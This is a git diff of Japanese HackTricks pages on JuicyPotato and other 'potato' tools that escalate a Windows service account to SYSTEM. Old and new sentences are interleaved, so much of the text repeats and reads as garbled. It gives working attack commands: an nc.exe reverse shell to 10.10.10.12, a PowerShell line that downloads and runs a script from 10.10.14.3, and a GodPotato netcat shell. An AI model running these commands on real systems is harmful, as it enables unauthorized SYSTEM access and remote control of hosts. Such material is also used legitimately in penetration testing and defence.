_**RottenPotatoNG**_ [_の甘いバージョン_](https://github.com/breenmachine/RottenPotatoNG)_で、少しジュースを加えたもの、つまり**WindowsサービスアカウントからNT AUTHORITY\SYSTEMへの別のローカル特権昇格ツール**_
|
||||
|
||||
#### [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)からjuicypotatoをダウンロードできます
|
||||
#### [juicypotatoをここからダウンロードできます](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
|
||||
|
||||
### 概要 <a href="#summary" id="summary"></a>
|
||||
|
||||
[**juicy-potato Readmeから**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
|
||||
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)およびその[バリアント](https://github.com/decoder-it/lonelypotato)は、[`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [サービス](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)に基づく特権昇格チェーンを活用し、MiTMリスナーが`127.0.0.1:6666`で動作し、`SeImpersonate`または`SeAssignPrimaryToken`特権を持っているときに発生します。Windowsビルドのレビュー中に、`BITS`が意図的に無効にされ、ポート`6666`が使用されているセットアップを見つけました。
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)およびその[バリアント](https://github.com/decoder-it/lonelypotato)は、[`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [サービス](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)に基づく特権昇格チェーンを活用し、MiTMリスナーが`127.0.0.1:6666`で実行され、`SeImpersonate`または`SeAssignPrimaryToken`特権を持っているときに発生します。Windowsビルドのレビュー中に、`BITS`が意図的に無効にされ、ポート`6666`が使用されているセットアップを見つけました。
|
||||
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)を武器化することにしました:**Juicy Potatoをご覧ください**。
|
||||
|
||||
> 理論については、[Rotten Potato - サービスアカウントからSYSTEMへの特権昇格](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)を参照し、リンクと参照先のチェーンをたどってください。
|
||||
|
||||
私たちは、`BITS`以外にも悪用できるCOMサーバーがいくつかあることを発見しました。それらは単に次のようにする必要があります:
|
||||
私たちは、`BITS`以外にも悪用できるCOMサーバーがいくつかあることを発見しました。それらは単に次のようである必要があります:
|
||||
|
||||
1. 現在のユーザー(通常はインパーソネーション特権を持つ「サービスユーザー」)によってインスタンス化できること
|
||||
2. `IMarshal`インターフェースを実装すること
|
||||
3. 昇格されたユーザー(SYSTEM、管理者、...)として実行すること
|
||||
1. 現在のユーザー(通常はインパーソネーション特権を持つ「サービスユーザー」)によってインスタンス化できる
|
||||
2. `IMarshal`インターフェースを実装する
|
||||
3. 昇格されたユーザー(SYSTEM、管理者、...)として実行される
|
||||
|
||||
いくつかのテストの後、いくつかのWindowsバージョンで興味深い[CLSIDのリスト](http://ohpe.it/juicy-potato/CLSID/)を取得してテストしました。
|
||||
いくつかのテストの後、[興味深いCLSIDの詳細なリスト](http://ohpe.it/juicy-potato/CLSID/)をいくつかのWindowsバージョンで取得してテストしました。
|
||||
|
||||
### 興味深い詳細 <a href="#juicy-details" id="juicy-details"></a>
|
||||
### Juicyの詳細 <a href="#juicy-details" id="juicy-details"></a>
|
||||
|
||||
JuicyPotatoを使用すると、次のことができます:
|
||||
|
||||
* **ターゲットCLSID** _希望するCLSIDを選択します。_ [_ここ_](http://ohpe.it/juicy-potato/CLSID/) _でOSごとに整理されたリストを見つけることができます。_
|
||||
* **ターゲットCLSID** _希望するCLSIDを選択します。_ [_ここ_](http://ohpe.it/juicy-potato/CLSID/)_でOSごとに整理されたリストを見つけることができます。_
|
||||
* **COMリスニングポート** _マーシャリングされたハードコードされた6666の代わりに好きなCOMリスニングポートを定義します_
|
||||
* **COMリスニングIPアドレス** _サーバーを任意のIPにバインドします_
|
||||
* **プロセス作成モード** _インパーソネーションユーザーの特権に応じて、次から選択できます:_
|
||||
* **プロセス作成モード** _インパーソネーションされたユーザーの特権に応じて、次から選択できます:_
|
||||
* `CreateProcessWithToken`(`SeImpersonate`が必要)
|
||||
* `CreateProcessAsUser`(`SeAssignPrimaryToken`が必要)
|
||||
* `両方`
|
||||
* **起動するプロセス** _悪用に成功した場合に実行する実行可能ファイルまたはスクリプトを起動します_
|
||||
* **起動するプロセス** _悪用が成功した場合に実行する実行可能ファイルまたはスクリプトを起動します_
|
||||
* **プロセス引数** _起動されるプロセスの引数をカスタマイズします_
|
||||
* **RPCサーバーアドレス** _ステルスアプローチのために外部RPCサーバーに認証できます_
|
||||
* **RPCサーバーアドレス** _ステルスアプローチのために、外部RPCサーバーに認証できます_
|
||||
* **RPCサーバーポート** _外部サーバーに認証する場合で、ファイアウォールがポート`135`をブロックしている場合に便利です..._
|
||||
* **TESTモード** _主にテスト目的で、CLSIDsのテストに使用されます。DCOMを作成し、トークンのユーザーを表示します。テストについては_ [_こちらを参照してください_](http://ohpe.it/juicy-potato/Test/)
|
||||
### 使用法 <a href="#usage" id="usage"></a>
|
||||
|
@ -93,13 +93,13 @@ Optional args:
|
|||
```
|
||||
### 最終的な考え <a href="#final-thoughts" id="final-thoughts"></a>
|
||||
|
||||
[**Juicy Potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
|
||||
[**Juicy Potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)** から:**
|
||||
|
||||
ユーザーが `SeImpersonate` または `SeAssignPrimaryToken` 特権を持っている場合、あなたは **SYSTEM** です。
|
||||
|
||||
これらのすべての COM サーバーの悪用を防ぐのはほぼ不可能です。これらのオブジェクトのアクセス許可を `DCOMCNFG` を介して変更することを考えることができますが、成功を祈ります、これは挑戦的になるでしょう。
|
||||
これらのすべての COM サーバーの悪用を防ぐのはほぼ不可能です。これらのオブジェクトのアクセス許可を `DCOMCNFG` を介して変更することを考えることができますが、成功を祈ります。これは挑戦的な作業になるでしょう。
|
||||
|
||||
実際の解決策は、`* SERVICE` アカウントで実行される機密アカウントおよびアプリケーションを保護することです。`DCOM` を停止することはこのエクスプロイトを阻止するでしょうが、基礎となる OS に深刻な影響を与える可能性があります。
|
||||
実際の解決策は、`* SERVICE` アカウントで実行される機密アカウントやアプリケーションを保護することです。`DCOM` を停止することは、このエクスプロイトを阻止する一方、基礎となる OS に深刻な影響を与える可能性があります。
|
||||
|
||||
出典: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
|
||||
|
||||
|
@ -107,7 +107,7 @@ Optional args:
|
|||
|
||||
注意: 試すための CLSID のリストについては、[このページ](https://ohpe.it/juicy-potato/CLSID/) を参照してください。
|
||||
|
||||
### nc.exe 逆シェルを取得
|
||||
### nc.exe リバースシェルを取得
|
||||
```
|
||||
c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
|
||||
|
||||
|
@ -120,7 +120,9 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
|
|||
|
||||
c:\Users\Public>
|
||||
```
|
||||
### Powershell 逆
|
||||
### Powershell rev
|
||||
|
||||
### Powershell逆
|
||||
```
|
||||
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
|
||||
```
|
||||
|
@ -130,7 +132,7 @@ c:\Users\Public>
|
|||
|
||||
## CLSIDの問題
|
||||
|
||||
しばしば、JuicyPotatoが使用するデフォルトのCLSIDは**機能せず**、エクスプロイトが失敗します。通常、**動作するCLSID**を見つけるために複数の試行が必要です。特定のオペレーティングシステム用に試すためのCLSIDのリストを取得するには、次のページを訪れる必要があります:
|
||||
しばしば、JuicyPotatoが使用するデフォルトのCLSIDは**機能せず**、エクスプロイトが失敗します。通常、**動作するCLSID**を見つけるために複数の試行が必要です。特定のオペレーティングシステム用に試すためのCLSIDのリストを取得するには、次のページを参照してください:
|
||||
|
||||
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
|
||||
|
||||
|
@ -138,7 +140,7 @@ c:\Users\Public>
|
|||
|
||||
まず、juicypotato.exe以外のいくつかの実行可能ファイルが必要です。
|
||||
|
||||
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)をダウンロードしてPSセッションにロードし、[GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)をダウンロードして実行します。そのスクリプトは、テストする可能性のあるCLSIDのリストを作成します。
|
||||
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)をダウンロードしてPSセッションにロードし、[GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)をダウンロードして実行します。そのスクリプトはテストする可能性のあるCLSIDのリストを作成します。
|
||||
|
||||
次に、[test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(CLSIDリストへのパスとjuicypotato実行可能ファイルへのパスを変更してください)をダウンロードして実行します。すべてのCLSIDを試行し始め、**ポート番号が変わると、CLSIDが機能したことを意味します**。
|
||||
|
||||
|
@ -148,9 +150,9 @@ c:\Users\Public>
|
|||
|
||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
|
@ -162,12 +164,12 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセス**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけます
|
||||
* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れる
|
||||
* **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* **💬**[**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **ハッキングトリックを共有するために**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と**[**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,21 +6,21 @@
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は**[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、**ハッキングトリックを共有**する。
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -32,7 +32,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
**JuicyPotato**はWindows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**、**[**GodPotato**](https://github.com/BeichenDream/GodPotato)を使用して、同じ特権を利用して`NT AUTHORITY\SYSTEM`レベルのアクセスを取得できます。この[ブログ投稿](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)では、`PrintSpoofer`ツールについて詳しく説明しており、JuicyPotatoが動作しなくなったWindows 10およびServer 2019ホストでインパーソネーション特権を悪用するために使用できます。
|
||||
{% endhint %}
|
||||
|
||||
## Quick Demo
|
||||
## クイックデモ
|
||||
|
||||
### PrintSpoofer
|
||||
```bash
|
||||
|
@ -92,9 +92,9 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
|
@ -106,14 +106,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからAWSハッキングをマスターしましょう</strong></summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
|
||||
* **HackTricksで会社を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue